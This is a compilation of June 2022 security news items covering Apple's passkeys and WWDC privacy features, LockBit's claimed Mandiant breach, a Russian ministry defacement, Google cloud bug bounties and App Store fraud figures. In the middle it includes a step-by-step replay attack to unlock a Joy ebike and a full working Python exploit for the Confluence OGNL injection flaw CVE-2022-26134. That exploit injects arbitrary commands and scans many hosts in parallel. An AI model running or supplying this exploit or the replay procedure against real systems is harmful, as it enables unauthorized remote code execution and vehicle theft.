Passkeys, Safety Check, and Private Access Tokens demonstrated during week-long virtual conference

Passkeys, Safety Check, and Private Access Tokens demonstrated during week-long virtual conference

The 2022 edition of Apple’s Worldwide Developers Conference (WWDC) kicked off this week, with numerous security and privacy developments placed front and center among the firm’s mobile and desktop platforms.

As has become tradition, this year’s WWDC offered a glimpse into Apple’s product and feature pipeline for the coming months.

On Monday (June 6), attendees were given a first look at the redesigned MacBook Air and the updated 13-inch MacBook Pro powered by the M2 chip, along with new features coming to iOS 16, iPadOS 16, macOS Ventura, and watchOS 9.

**What’s new in Safari?**

Apple’s Safari browser – which is now thought to have overtaken Chrome as the most popular mobile browser in North America – will soon include several security and privacy enhancements designed to help protect users and open up new opportunities for developers.

“With both of the new Cross Origin Opener Policy and Cross Origin Embedder Policy HTTP response headers, your site can opt in to process isolation, which means your site will run in its own dedicated webContent process,” said Kendall Bagley, software engineer on the Safari team.

**DON’T MISS** HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

“Our second security enhancement also involves HTTP headers, with our improved support for Content Security Policy Level 3. CSP provides enhanced security control over your loading content and mitigates risk of cross-site scripting \[XSS\] and other vulnerabilities.”

Check out the Safari 16 beta release notes for more information.

WWDC22 attendees watch the unveiling of iOS 16

**Introducing Passkeys**

Garrett Davidson of Apple’s authentication experience team took to the virtual stage at WWDC22 to showcase Passkeys, the company’s “next-generation authentication technology”.

“Passwords are really hard to use securely,” Davidson explained. “All of us know we’re supposed to create strong, unique passwords for every account, but not many people actually do.”

He added: “As you’re designing your apps and websites, there’s this constant trade-off between keeping accounts secure and designing a good experience. And even if your apps and websites do everything right, issues like phishing and password reuse can still lead to account compromise.”

Read more of the latest Apple security news

To tackle this, Passkeys – which will come bundled with the upcoming macOS Ventura and iOS 16 – creates a unique, cryptographically strong key pair for user accounts and stores it in iCloud Keychain so it syncs and works across all devices.

Once the pairing has been created, any future visit to the app or website sign-in form will show the ‘Passkey’ option in the QuickType bar. The user simply needs to tap the option, or use Touch ID, and they are signed in.

Davidson said: “With Passkeys, not only is the user experience better than a password, but also entire categories of security problems, like weak and reused credentials, credential leaks, and phishing, are just not possible anymore. And they are so easy to use.”

Visit Apple’s technical documentation page for implementation information.

**Safety Check**

Also new for Apple devices this year is a new privacy tool called Safety Check, which aims to help users whose personal safety might be at risk from domestic or intimate partner violence.

Designed to allow users to quickly remove all device access that may have granted to others, Safety Check includes an emergency reset that helps users easily sign out of iCloud on all their other devices, reset privacy permissions, and limit messaging to just the device in their hand.

The service also helps users understand and manage which people and apps they’ve given access to.

**Replacing CAPTCHAs**

That’s not all from WWDC22, as two additional privacy and security tools are due to be showcased later this week.

On Wednesday (June 8), the Apple team will demonstrate Private Access Tokens. This new technology is being marketed as a “powerful alternative” to CAPTCHA challenges that help the identification of HTTP requests from legitimate devices without compromising users’ identity.

“We’ll show you how your app and server can take advantage of this tool to add confidence to your online transactions and preserve privacy,” Apple said.

**YOU MIGHT ALSO LIKE** Popular websites leaking user email data to web tracking domains

Lastly, June 10 will see Apple showcase the latest ways to ensure that DNS – the foundation of internet addressing – is secure within an application.

“Learn how to authenticate DNS responses in your app with DNSSEC and enable DNS encryption automatically with Discovery of Designated Resolvers (DDR),” Apple said in its presentation teaser this week.

WWDC22 continues through June 10. Check out the complete list of sessions for further information.

**READ MORE** Google showers top cloud security researchers with kudos and cash

WWDC 2022: Apple showcases next-gen security tech at annual developer event

By Deeba Ahmed
According to a Mandiant representative, the company was aware of LockBit 2.0 claims, but there was no evidence of…
This is a post from HackRead.com Read the original post: Cyber Security Giant Mandiant Denies Hacking Claims By LockBit Ransomware

****According to a Mandiant representative, the company was aware of LockBit 2.0 claims, but there was no evidence of a cyberattack as yet.****

The infamous ransomware-as-a-service group using a variant of LockBit ransomware (LockBit 2.0) has claimed to have successfully hacked Mandiant cybersecurity firm and threatened to release company files. 

The ransomware gang was first seen in September 2019 as ABCD ransomware and has since targeted thousands of organizations worldwide. In its latest attack, the LockBit ransomware gang claimed that it would release Mandiant data on its Dark Web portal.

The group further claimed that they have stolen 356,841 files from Mandiant, which they intend to leak online. For your information, LockBit 2.0 has hit many high-profile entities in the past including the following:

*   Bangkok Airways
*   Crypto exchange PayBito,
*   The French Ministry of Justice
*   Global systems integrator Accenture

**No Evidence of Hacking- Mandiant**

According to a Mandiant representative, the company was aware of LockBit 2.0 claims, but there was no evidence of a cyberattack as yet. After LockBit 2.0 posted its second threat message late Monday, the company released a statement.

In response, the company rep stated that there’s no indication that Mandiant’s security was compromised. Moreover, they noted that the gang could be trying to “disprove Mandiant’s June 2nd, 2022 research blog on UNC2165 and LockBit.”

**The Bone of Contention**

The group has reportedly reacted to Mandiant’s report (published on June 2nd, 2022) in which the company claimed that the off-the-shelf ransomware LockBit 2.0 was in use by the Russian Evil Corp affiliates dubbed UNC2165 to evade sanctions.

This group was sanctioned by the U.S. Treasury Department‘s Office of Foreign Assets Control (OFAC) in 2019. However, LockBit 2.0’s website displayed a note posted by the group claiming that they didn’t have any affiliation with Evil Corp and rejected Mandiant’s claims in the report.

> “Our group has nothing to do with Evil Corp. We are real underground darknet hackers, we have nothing to do with politics or special services like FSB, FBI, and so on.”
> 
> LockBit 2.0

As seen by Hackraed.com, the gang has released a note maintaining its claims of attack on Mandiant and addressing the company’s report published last week.

Screenshot from LockBit gang’s dark web site (Image: Hackread.com)

Lockbit ransomware group’s response to Mandiant’s blog post

As per Emsisoft threat analyst Brett Callow, this group has previously made several false claims. In some cases, the group claimed to steal data from different firms, so it is “entirely possible” that the claims made by LockBit 2.0 have no substance.

The timing of the disclosure of this attack on Mandiant is unusual as it comes when the RSA cybersecurity conference has just started, and Mandiant is to be acquired by Google in a whopping $5.4 billion deal.

**More Ransomware News**

1.  Ransomware Attacks: Everything You Need to Know
2.  Conti Ransomware Gang Hits German Wind Turbine Giant Nordex
3.  GoodWill Ransomware demands food for the poor to decrypt locked files
4.  Cardiologist Charged for Developing Jigsaw v.2 and Thanos Ransomware
5.  PoC Shows IoT Devices Can Be Hacked to Install Ransomware on OT Network

Cyber Security Giant Mandiant Denies Hacking Claims By LockBit Ransomware

joyebike Joy ebike Wolf Manufacturing year 2022 is vulnerable to Authentication Bypass by Capture-replay.

**Joy Ebike Wolf 2022 variant replay attack to unlock the scooter**

This is a report about a cyber security issue identified in Joy ebike unlock feature

**Summary**: Joy ebike Wolf variant manufactured in 2022 has a feature to lock or unlock/drive the vehicle via ebike key fob. In this vehicle, if the unlock/drive command is sniffed by Hackrf and replayed, it is possible to unlock/drive the vehicle.

**Affected Produc**t: Joy ebike Wolf, Manufacturing year 2022

**Addition details URL**: https://www.joyebike.com/product/wolf-bike/

**Detailed report**

**Required Setup**:

1.  Joy ebike Wolf, Manufacturing year 2022
2.  Joy ebike vehicle keys.
3.  Hackrf with antenna

**Following steps shall be followed to achieve the Proof of concept**:

1.  Activate Hackrf in rx mode on 433.92 MHz
2.  Press unlock/drive button on key fob
3.  Hackrf captures the unlock frame command.
4.  Lock the vehicle with a key.
5.  Now replay the command which is captured.
6.  Vehicle gets unlocked and is able to drive.

Additional Note: Further analysis is not conducted, but multiple commands can be replayed.

**Video proof of concept**:

https://drive.google.com/file/d/1COrBDuncLs5yR5lotpxyMSWQDY6Br-qj/view?usp=sharing

CVE-2022-30466: GitHub - nsbogam/ebike

As Mandiant CEO Kevin Mandia's company prepares to become part of Google, the incident response company continues to investigate many of the most critical cyber incidents.

RSA CONFERENCE 2022 – San Francisco – Back in the early 2000s when Mandiant was a small consulting firm in Northern Virginia, Kevin Mandia typically worked on just one incident response (IR) case at a time. Today, Mandia's team at the now IR giant Mandiant – which Google is in the process of acquiring – works on more than a half-dozen cases concurrently.

The volume of attacks is growing, especially so over the past year, according to Mandia. In recent IR cases Mandiant has been investigating, zero-day attacks and pilfered credentials have become the weapon of choice to infiltrate an organization, overtaking phishing.

"A lot of customers are saying, 'How long do we have to have our Shields Up?'" he said, in reference to the Cybersecurity and Infrastructure Security Agency (CISA)'s current slogan for warning organizations to operate at heightened alert amid increasing cyber threat activity. "I think you have to keep \[them\] up. That's a lesson we're learning this year," Mandia said in an interview with Dark Reading this week.

"The impact of a breach is so much graver now," he said. Not only are ransomware and extortion getting more brazen and chaos-causing with public data leaks and digital blackmail, but cybercriminals are basically catching up with nation-states when it comes to exploiting expensive zero-day vulnerabilities in software, he said.

"In the early days, zero days were the purview of governments. In 2017, you started to see criminal elements arming a zero day," he said. Today, it's close to a 60-40 split, with nation-states still leading in zero-day attacks but with criminals not far behind. "That came sooner than I thought," Mandia added. "It just tells you how much money you can make hacking."

**Silver Lining**

But if there's a bit of good news, it's that organizations calling on Mandiant for help with an incident are spotting their intrusions sooner: "We're getting hired earlier in the breach process, and there's less \[attacker\] dwell time," he said.

Specifically, Mandiant saw the amount of time attackers remained unnoticed on a victim's network dropped to 21 days in 2021, down from 24 days in 2020. That trend has been steady for the past four years in Mandiant's IR cases.

There's also a sense of urgency now among cybercriminals to ensure they snag the valuable data or demand their ransom for stolen data, Mandia said. "I was told today that the time frame dwell time used to be that they had access for about seven days, and that's coming down to four to five days now. That speed means it's getting harder to monetize" and cybercriminals have to work faster and more publicly to make their money, he explained.

And the stakes are higher than ever for CISOs trying to deter and deflect a big breach. "This is the hardest year to be a CISO," he said. "Now you're \[also\] protecting your people threatened online, your employees, your customers. It's so much, and it's an unfair fight with \[mostly\] no risk of repercussions for the bad guys."

The threat includes the recent wave of phony or impossible-to-prove public data leak claims by threat actors and other fraudsters attempting to shake down or defame a victim organization. 

"It's impossible to prove a negative," Mandia said of these phony breach declarations that emerge. And organizations are forced to investigate an intrusion that may not even have occurred. 

"It's becoming more frequent," he said of this latest form of pressure by cybercriminals. There's nothing harder to respond to; something that's public, the hacker is vocal and making claims. And a company can't dispute them \[at first\] because they have to figure out the answers first. Those are terrible situations."  

That hit close to home for Mandia because, while Dark Reading was interviewing him on Monday, Mandiant itself became the subject of a fake breach assertion by the LockBit ransomware gang, which posted on Twitter that it had hacked the IR company. The claim appears to have been retribution for a recent ransomware report by Mandiant. 

"Based on the data released, there are no indications that Mandiant data has been disclosed," Mandiant said in a tweet today about the claims. "Rather the actor appears to be trying to disprove our June 2, 2022 research on UNC2165 and LockBit. We stand behind the findings of this research."

**Googling Mandiant**

Meanwhile, Mandiant is preparing for the completion of its merger with Google. Google announced its intent to acquire Mandiant in March for a whopping $5.4 billion, and Mandia at the time touted the merger as a way to build out Mandiant's planned strategy of automating specific elements of the IR process. Google's investment should accelerate that strategy.

"You have to automate as much as you can," Mandia told Dark Reading this week. Tasks such as detection, collecting artifacts, and log file analysis could be automated, he noted. But there still are parts of IR that remain human tasks, such as attribution and deep-dive forensic analysis.  

"If there's ever a deepfake or false-flag operation, it will be a human that will \[spot it\]," Mandian said.

Mandia: Keep 'Shields Up' to Survive the Current Escalation of Cyberattacks

By Deeba Ahmed
The targeted website which belongs to the Russian Ministry of Construction, Housing, and Utilities, was also asked to…
This is a post from HackRead.com Read the original post: Russian Ministry Website Hacked to Display “Glory To Ukraine” Message

**The targeted website which belongs to the Russian Ministry of Construction, Housing, and Utilities, was also asked to pay a 0.5 BTC ransom to avoid the leak of stolen user data.**

Russian Ministry of Construction, Housing and Utilities’ website (minstroyrf.gov.ru) was hacked over the weekend. When searched on the internet, the site’s address led to a sign in the Ukrainian language that read- “Glory to Ukraine.”

The hackers also demanded ransom to prevent the leaking of personal data of the site users. According to RIA, a Russian state news outlet, a ministry representative confirmed that the site was offline, but user data wasn’t compromised. 

The Russian language message when translated to English via Google Translate states that: “Hacked by the DumpForums team. The entire database has been exported and will probably appear on our forum soon. Site administrators have until 06/07/2022 0:00 am to transfer exactly 0.5 BTC to this wallet: . Otherwise, all personal data of users of the Ministry of Construction of the Russian Federation, and possibly not only ;) will be made available to the public. (Credit: Hackread.com)

However, as seen by Hackread.com on Telegram, the group behind the hack going by the online handle of DumpForums is still claiming to have access to the ministry’s data. According to the hackers, the website uses Bitrix Content Management System (CMS).

Furthermore, to prove their claim, the group also published a screenshot of data that they claimed belonged to the targeted ministry website and its registered users. The data included the following information:

*   Full name
*   Login name
*   Email address
*   Password (MD5 with salt) Hashes
*   Date of registration (from 08/14/2014 to 05/08/2022)

At the time of publishing this article, the ministry website was offline. This, however, isn’t the first time a Russian government institution or organization has been targeted. In the months following the Russian invasion of Ukraine in late February 2022, Anonymous hacktivists have hacked several high-profile Russian websites, TV stations’ live broadcasts, and entities.

These include Russia’s state-owned news agency TASS, St. Petersburg-based news outlet Fontanka, and daily newspaper Kommersant, while some television channels impacted by the cyberwar waged against Russia include Channel One, NTV-Plus, and Rossiya-1. Hackers also targeted the Russian video hosting platform RuTube, which went offline for three days.

1.  DDoS Attacks by Hacktivists Disrupted Russian Alcohol Supply Chain
2.  Anonymous sent 7 million texts to Russians & hacked their security cams
3.  Russian TV Schedules Hacked on Victory Day to Show Anti-War Messages
4.  Confirmed: Anonymous Hacks Central Bank of Russia; Leaks 28GB of Data
5.  Anonymous & its affiliates hacked 90% of Russian misconfigured databases

Russian Ministry Website Hacked to Display “Glory To Ukraine” Message

More than $300,000 was handed out in GCP prize money during 2021

More than $300,000 was handed out in GCP prize money during 2021

Ethical hackers have earned more than $300,000 after uncovering a variety of flaws in Google Cloud Platform (GCP).

The top seven responsibly disclosed vulnerabilities that qualified under GCP’s Vulnerability Rewards Program (VRP) last year scooped a total of $313,337, with the winner taking away $133,337.

Google said the GCP VRP – which began in 2019 – shows that many talented security researchers are getting involved in improving cloud security by uncovering vulnerabilities that might have otherwise gone undetected.

The amount awarded represents a sizeable fraction of the $8.7 million awarded by Google across its complete range of vulnerability disclosure programs.

**I’m IAP, hope you’re API too**

The first prize, and an award of $133,337, went to security researcher Sebastian Lutz for discovering a bug in in Identity-Aware Proxy (IAP) that offered a way for an attacker to access IAP-protected resources.

The flaw meant that if an attacker tricked a prospective victim into visiting a URL that was under their control, they would be able to steal their IAP authentication token, as explained in greater depth in a technical blog post.

**Does not compute**

Hungarian researcher Imre Rad earned a second prize of $73,331 after uncovering a mechanism to take over a Google Compute Engine virtual machine.

The hack relied on sending malicious Dynamic Host Configuration Protocol (DHCP) packets to the virtual machine in order to spoof the Google Compute Engine metadata server.

RELATED Vast majority of ethical hackers keen to spend more time bug bounty hunting – report

As explained in a technical write-up by Rad on Github, the flaw and associated attacks were first reported to Google in September 2020.

A protracted disclosure process followed, and its was only after Rad went public with his findings in June 2021 that Google fixed the issue a month later.

**Going with the dataflow**

Third spot in the 2021 edition of the GCP VRP stakes – along with a prize of $73,331 – went to security researcher Mike Brancato for the discovery and disclosure of a remote code execution (RCE) vulnerability in Google Cloud Dataflow.

Brancato discovered that Dataflow nodes were exposing an unauthenticated Java JMX port, a security weakness that made it possible to run arbitrary commends on the virtual machine, as explained in a technical blog post.

The impact of the vulnerability depends on which service account is assigned to Dataflow worker nodes, Brancato told The Daily Swig.

The researcher explained: “By default that is the Google Compute Engine default service account, which has the project-wide Editor role assigned. The Editor role has a lot of permissions to create and destroy resources - it is part of the ‘basic roles’ that Google doesn’t recommend using because they provide broad permissions.”

Read more of the latest cloud security news

They added: “The vulnerability is easily exploitable with existing tools like Metasploit,” provided an attacker identifies an open firewall port that exposed a vulnerable system to potential attack.

The security researcher has been working in cloud security since 2017 and bug bounty hunting has become a natural extension to their regular work.

“As part of my exposure to cloud APIs and my background, I started to identify systems that appear interesting and may be vulnerable to attack,” Brancato concluded.

The Daily Swig also invited Lutz and Rad to comment on their respective research, as well as asking Google how it would like to improve cloud-focused elements of its bug bounty program.

RECOMMENDED HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

Google showers top cloud security researchers with kudos and cash

Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.

    #!/usr/bin/python3# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection# Google Dork: N/A# Date: 06/006/2022# Exploit Author: h3v0x# Vendor Homepage: https://www.atlassian.com/# Software Link: https://www.atlassian.com/software/confluence/download-archives# Version: All < 7.4.17 versions before 7.18.1# Tested on: -# CVE : CVE-2022-26134# https://github.com/h3v0x/CVE-2022-26134import sysimport requestsimport optparseimport multiprocessingfrom requests.packages import urllib3from requests.exceptions import MissingSchema, InvalidURLurllib3.disable_warnings()requestEngine = multiprocessing.Manager()session = requests.Session()global paramResultsparamResults = requestEngine.list()globals().update(locals())def spiderXpl(url):    globals().update(locals())    if not url.startswith('http'):        url='http://'+url        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",               "Connection": "close",               "Accept-Encoding": "gzip, deflate"}    try:        response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)        if(response.status_code == 302):            print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])            inputBuffer = str(response.headers['X-Cmd-Response'])            paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')        else:            pass    except requests.exceptions.ConnectionError:        print('[x] Failed to Connect: '+url)        pass    except multiprocessing.log_to_stderr:        pass    except KeyboardInterrupt:        print('[!] Stoping exploit...')        exit(0)    except (MissingSchema, InvalidURL):        pass        def banner():    print('[-] CVE-2022-26134')    print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')    def main():    banner()        globals().update(locals())        sys.setrecursionlimit(100000)    if not optionsOpt.filehosts:        url = optionsOpt.url        spiderXpl(url)    else:        f = open(optionsOpt.filehosts)        urls = map(str.strip, f.readlines())        multiReq = multiprocessing.Pool(optionsOpt.threads_set)        try:            multiReq.map(spiderXpl, urls)            multiReq.close()            multiReq.join()        except UnboundLocalError:            pass        except KeyboardInterrupt:            exit(0)    if optionsOpt.output:        print("\n[!] Saving the output result in: %s" % optionsOpt.output)        with open(optionsOpt.output, "w") as f:            for result in paramResults:                f.write("%s\n" % result)        f.close()if __name__ == "__main__":    parser = optparse.OptionParser()    parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')    parser.add_option('-f', '--file', dest="filehosts", help='example.txt')    parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)    parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)    parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')    parser.add_option('-c', '--cmd', dest="command", type=str, default='id')    optionsOpt, args = parser.parse_args()    main()

Confluence OGNL Injection Remote Code Execution

Apple’s iOS 16 and macOS Ventura will introduce passwordless login for apps and websites. It’s only the beginning.

Your passwords are terrible. Year after year, the most popular passwords leaked in data breaches are 123456, 123456789, and 12345—‘qwerty’ and ‘password’ come close behind—and using these weak passwords leaves you vulnerable to all sorts of hacking. Weak and repeated passwords are one of the most significant risks to your online life.

For years, we’ve been promised a more secure, password-free future, but it seems like 2022 will _actually_ be the year that millions of people start to move away from passwords. At Apple’s Worldwide Developer Conference yesterday, the company announced it will launch passwordless logins across Macs, iPhones, iPads, and Apple TVs around September of this year. Instead of using passwords, you will be able to log in to websites and apps using “Passkeys” with iOS 16 and macOS Ventura. It’s the first major real-world shift to password elimination.

So how does it work? Passkeys replace your tired old passwords by creating new digital keys using Touch ID or Face ID, Apple’s vice president of internet technologies, Darin Adler, explained at WWDC. When you are creating an online account with a website, you can use a Passkey instead of a password. “To create a Passkey, just use Touch ID or Face ID to authenticate, and you’re done,” Adler said.

When you go to log in to that website again, Passkeys allow you to prove who you are by using your biometrics rather than typing in a passphrase (or having your password manager enter it for you). When signing in to a website on a Mac, a prompt will appear on your iPhone or iPad to verify your identity. Apple says its Passkeys will sync across your devices using iCloud’s Keychain, and the Passkeys are stored on your devices rather than on servers. (The use of iCloud Keychain should also solve the problem of losing or breaking your linked devices.) Under the hood, Apple’s Passkeys are based on the Web Authentication API (WebAuthn) and are end-to-end encrypted so nobody can read them, including Apple. The system for creating Passkeys uses public-private key authentication to prove you are who you say you are.

A passwordless system would be a significant step forward for most people’s online security. As well as eliminating guessable passwords, removing passwords reduces the likelihood of successful phishing attacks. And passwords can’t be stolen in data breaches if they don't exist in the first place. (Some apps and websites already allow people to log in using their fingerprints or using face recognition, but these usually require you to first create an account with a password.)

Apple’s Passkeys aren’t entirely new—the company first detailed them at 2021’s WWDC and started testing them shortly after—and Apple isn’t the only one that wants to eliminate passwords. The FIDO Alliance, a tech industry group, has been working on the underlying standards needed to ditch passwords for almost a decade, and Apple’s Passkeys are the company’s implementation of these standards.

In recent months, FIDO has taken a series of important steps to bring the password’s demise closer to reality. In March, FIDO announced it has figured out a way to store the cryptographic keys that sync between people’s devices, calling them “multi-device FIDO credentials” or “passkeys.”

This was followed in May by Apple, Microsoft, and Google declaring their support for the FIDO standards. Jen Easterly, the director of the US Cybersecurity and Infrastructure Security Agency, said adoption of the standards would keep more people safe online. At the time, the three tech giants said they would start rolling out the technology “over the course of the coming year.” Microsoft account owners have been able to ditch their passwords since September of last year, and Google has been working on its passwordless technology since 2008.

When all the tech companies have rolled out their version of passkeys, it should be possible for the system to work across different devices—in theory, you could use your iPhone to log in to a Windows laptop, or an Android tablet to log in to a website in Microsoft’s Edge Browser. “All of FIDO’s specs have been developed collaboratively, with inputs from hundreds of companies,” says Andrew Shikiar, the executive director of the FIDO Alliance. Shikiar confirms that Apple is the first company to start rolling out passkey-style technology and says this shows “how tangible this approach will soon be for consumers worldwide.”

Any success for a passwordless future depends on how it works in reality. At the moment, there are unanswered questions about what happens to your Passkeys if you want to ditch Apple’s ecosystem for Android or another platform. (Apple hasn’t yet responded to our request for comment.) And developers still need to implement changes to their apps and websites to work with Passkey. Plus, to gain trust in any system, people need to be educated about how it works. “Any viable solution must be safer, easier, and faster than the passwords and legacy multi-factor authentication methods used today,” ​​Alex Simons, the head of Microsoft’s identity management efforts, said in May. In short: If cross-device systems are clunky or a pain to use, people may shun them in favor of weak but convenient passwords.

While Apple’s Passkey and Google and Microsoft’s equivalents are still some months away (at the very least), that doesn’t mean you should idly keep using your weak or repeated passwords. Every password you use—whether it’s for a one-time account used to buy DIY supplies or your Facebook account—should be strong and unique. Don’t use common phrases, names of friends or pets, or personal information linked to you in your passwords.

Instead, your passwords should be long and strong. The best way to achieve this is by using a password manager, which can help you create and store better passwords. You can find our pick of the best password managers here. And while you’re thinking about your security, turn on multi-factor authentication for as many accounts as possible.

Apple Just Killed the Password—for Real This Time

Apple's published some numbers about the number of apps blocked from getting into the App store, along with other security news from the WWDC
The post Rotten apples banned from the App store appeared first on Malwarebytes Labs.

Apple’s App Review process may have received ill wishes from many benevolent developers, but Apple has now revealed how effective it is and why it is so stringent.

According to its review of the year 2021, Apple protected customers from nearly $1.5 billion in potentially fraudulent transactions, and stopped over 1.6 million risky and vulnerable apps and app updates from defrauding users.

**Bad apples**

In 2021, Apple rejected or removed over 835,000 problematic new apps, and an additional 805,000 app updates. Some were removed because they were found to be unfinished or contained bugs that impeded functionality, others because they needed improvements in their moderation mechanisms for user-generated content.

The App Review team also rejected over 343,000 apps for requesting more user data than necessary or mishandling the data they already collected.

To put these numbers in perspective, 107,000 new developers managed to get their apps onto the store. Some of which may have gone through rejection on earlier occasions, but received a stamp of approval in the end.

_Image courtesy of Apple_

**Rotten apples**

Over the same year, the App Review team rejected more than 34,500 apps for containing hidden or undocumented features. They also rejected upward of 157,000 apps because they were found to be spam, copycats, or misleading to users, for example, by manipulating them into making a purchase.

Also, Apple removed over 155,000 apps from the App Store because the developers altered the concept or functionality of the app after receiving approval at first. Altering the app after release is a method threat actors can use to try and bypass the App Review process.

**Fraudulent accounts**

When developer accounts are used for fraudulent purposes, the offending developer’s Apple Developer Program account and any related accounts are terminated.

As a result of these efforts, Apple terminated over 802,000 developer accounts in 2021. Apple rejected an additional 153,000 developer enrollments over fraud concerns, preventing these threat actors from ever submitting an app to the store.

**Financial fraud**

Using both human and tech review, Apple stopped more than 3.3 million stolen cards from being used to make potentially fraudulent purchases. Nearly 600,000 accounts were banned from ever transacting again. In total, Apple protected users from nearly $1.5 billion in potentially fraudulent transactions in 2021.

**User concerns**

If users have concerns about an app, they can report it by clicking on the Report a Problem feature on the App Store or calling Apple Support, and developers can use either of those methods or additional channels like Feedback Assistant and Apple Developer Support.

As part of the App Review process, any developer who feels they have been incorrectly flagged for fraud may file an appeal to the App Review Board.

**Passwords**

Apple also announced at its annual Worldwide Developers Conference (WWDC) that it will introduce support for third-party two-factor authentication apps with the built-in Passwords feature in the Settings app.

iOS 16, which is expected to be released in September 2022, will permit users to edit strong passwords suggested by Safari to adjust for site‑specific requirements.

Apple also confirmed it’s bringing support for passkeys in the Safari web browser, a next-generation passwordless sign-in standard that allows users to log in to websites and apps across platforms using Touch ID or Face ID for biometric verification.

Passkeys never leave your device and are specific to the site you created them for. Which makes phishing for them almost impossible. The passkey mechanism was established by the FIDO Alliance and is already backed by Google and Microsoft. As such, it aims to replace standard passwords by providing unique digital keys stored locally on the device.

Tag

#google